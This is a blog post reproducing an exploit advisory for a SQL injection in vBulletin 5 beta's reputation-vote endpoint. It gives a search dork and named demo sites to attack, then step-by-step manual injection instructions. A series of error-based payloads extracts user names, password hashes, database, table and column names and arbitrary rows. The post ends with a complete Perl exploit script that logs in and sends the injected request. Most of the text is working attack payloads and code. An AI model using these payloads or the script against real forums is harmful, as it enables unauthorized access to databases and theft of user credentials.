Tuesday, 21 May 2013

SQL vbulletin 5.x và code perl

#Title: vBulletin 5 SQL Injection > Beta Whatever
#Author: 0x0A
#Type: SQL Injection
#Requirements: Firefox/Live HTTP Headers/
#Software Link: http://www.vbulletin.com/purchases/
http://www.vbulletin.com/features/
#Version: 5 and above(not older versions)
#Tested on: Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux
#Dork: "Powered by vBulletin™ Version 5.0.0 Beta"
#Demo sites to try: http://www.sultantheme.com/vb5connectforum/
http://vb5connect.com/bb/

How to manually inject :
-------------------------------------------------------------------
[#1] First of all, make an account to the vBulletin 5 forum,
-------------------------------------------------------------------


--------------------------------------------------------------------

[#2] After that, go to any topic and open Live HTTP Headers
--------------------------------------------------------------------

------------------------------------------------------------------------------------------
[#3] Then click the Like button on the topic. Live HTTP Headers will capture a request very similar to the one shown in the original write-up. Select the first POST record (the vote request — the Perl script below targets `index.php/ajax/api/reputation/vote`; the original screenshot is not reproduced here) and click the Replay button.
-------------------------------------------------------------------------------------------

-------------------------------------------------------------------
[#4] Then, on Send POST Content use this :
-------------------------------------------------------------------
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT
concat(0x7e,0x27,username,0x27,0x7e,password,0x27, 0x7e) FROM user LIMIT 1,1) ) from information_schema.tables limit
0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
---------------------------------------------------------------------------------------------

// Note: keep the `nodeid` value exactly as it was in the original POST content and only append the injection after it (the `70` above is an example); otherwise the request is rejected with an "invalid nodeid" error.
The payload above is an error-based (duplicate-key) injection: the `floor(rand(0)*2)` GROUP BY trick makes MySQL raise a "Duplicate entry ... for key 'group_key'" error, and the selected value is returned inside that error message between the `~'...'~` markers. Note that `LIMIT 1,1` selects the *second* row of the `user` table (offset 1), not the first; use `LIMIT 0,1` for the first row. The `password` column returns the stored password value, which is a hash, not a plaintext password.
-------------------------------------------------------------------

[#Other SQLi Syntaxes]

+-------------------------+
|Version():
+-------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e))
from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND
(1338=1338
+-------------------------+



+-------------------------+
|User():
+-------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(user() as char),0x27,0x7e))
from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND
(1338=1338
+-------------------------+


+-------------------------+
|Database():
+-------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(database() as
char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by
x)a) AND (1338=1338
+-------------------------+


+-------------------------+
|Database Print:
+-------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name
as char),0x27,0x7e) FROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit
0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+-------------------------+


+-------------------------+
|Table Count:
+-------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT
concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=0xHEXCODEOFDATABASE))
from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND
(1338=1338
+-------------------------+


+-------------------------+
Print Tables:
+-------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as
char),0x27,0x7e) FROM information_schema.tables Where table_schema=0xHEXCODEOFDATABASE LIMIT N,1)) from
information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+-------------------------+


+-------------------------+
|Columns of selected table:
+-------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT
concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns WHERE
table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name)) from information_schema.tables limit
0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+-------------------------+

+-------------------------+
|Fetch Out Data:
+-------------------------+
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT
concat(0x7e,0x27,column1,0x27,0x7e,column2,0x27,0x7e) FROM ANY_TABLE LIMIT N,1) ) from information_schema.tables limit
0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
+-------------------------+



CODE PERL
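#!/usr/bin/perl
# vBulletin 5 Beta SQLi proof of concept (error-based injection through the
# "nodeid" parameter of index.php/ajax/api/reputation/vote).
#
# Flow: log in with a regular forum account, then send a single injected
# vote request and print the MySQL version() string that leaks back inside
# the duplicate-key error message (delimited by '#' / 0x23 markers).
#
# Usage: perl vb5exp.pl WWW.HOST.COM VBPATH URUSER URPASS MAGICNUM
#   WWW.HOST.COM  forum host (plain http:// is assumed)
#   VBPATH        forum path with leading and trailing slash, e.g. /bb/
#   URUSER/URPASS credentials of an existing account
#   MAGICNUM      an existing nodeid taken from a real Like request; the
#                 endpoint rejects unknown nodeids before the SQL is reached
#
# Requires libwww-perl (LWP::UserAgent, HTTP::Cookies); MIME::Base64 is core.
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Request::Common;
use MIME::Base64;

system $^O eq 'MSWin32' ? 'cls' : 'clear';
print "
+===================================================+
|           vBulletin 5 Beta XX SQLi 0day           |
+===================================================+
";
if (@ARGV != 5) {
    print "\r\nUsage: perl vb5exp.pl WWW.HOST.COM VBPATH URUSER URPASS MAGICNUM\r\n";
    exit;
}
my ($host, $path, $username, $password, $magicnum) = @ARGV;
my $base = 'http://' . $host . $path;

# The second argument '' suppresses the trailing "\n" that encode_base64
# appends by default; the original script sent that newline inside the
# 'url' form field.
my $encpath = encode_base64($base, '');

print "[+] Logging\n";
print "[+] Username: " . $username . "\n";
print "[+] Password: " . $password . "\n";
print "[+] MagicNum: " . $magicnum . "\n";
print "[+] " . $host . $path . "auth/login\n";

# One user agent for both requests. The User-Agent is set through the
# constructor: the original passed the bareword key `User-Agent`, which Perl
# parses as `User - Agent` (key "0"), so the header was never actually sent.
my $ua_string = 'Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0';
my $browser   = LWP::UserAgent->new(agent => $ua_string);

# The jar has to be attached BEFORE the login request, otherwise the session
# cookies in the login response are discarded and the vote request below
# goes out unauthenticated (which is what the original ordering did).
my $cookie_jar = HTTP::Cookies->new;
$browser->cookie_jar($cookie_jar);

my $login = $browser->post(
    $base . 'auth/login',
    [
        'url'      => $encpath,
        'username' => $username,
        'password' => $password,
    ],
    Referer => $base . 'auth/login-form?url=' . $base,
);
# NOTE(review): only the HTTP status is reported here; whether the login was
# actually accepted shows up later as a missing version string.
print "[+] Login HTTP status: " . $login->status_line . "\n";

print "[+] Requesting\n";
# The injected value is left byte-identical to the advisory payload. It is an
# error-based (duplicate-key) injection: version() is wrapped in 0x23 ('#')
# markers so it can be picked out of the MySQL error text below.
my $response = $browser->post(
    $base . 'index.php/ajax/api/reputation/vote',
    [
        'nodeid' => $magicnum.') and(select 1 from(select count(*),concat((select (select concat(0x23,cast(version() as char),0x23)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338',
    ],
);

my $data = $response->content;
# Match "#...#" allowing backslash escapes, as the JSON error body may
# escape characters inside the leaked string.
if ($data =~ /(#(?:\\.|[^\\#])*#)/) {
    print '[+] Version: ' . $1;
    print "\n";
    exit 0;
}
print "[-] No version string found in the response";
print " (login may have failed, or the nodeid is not valid for this forum).\n";
exit 1;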
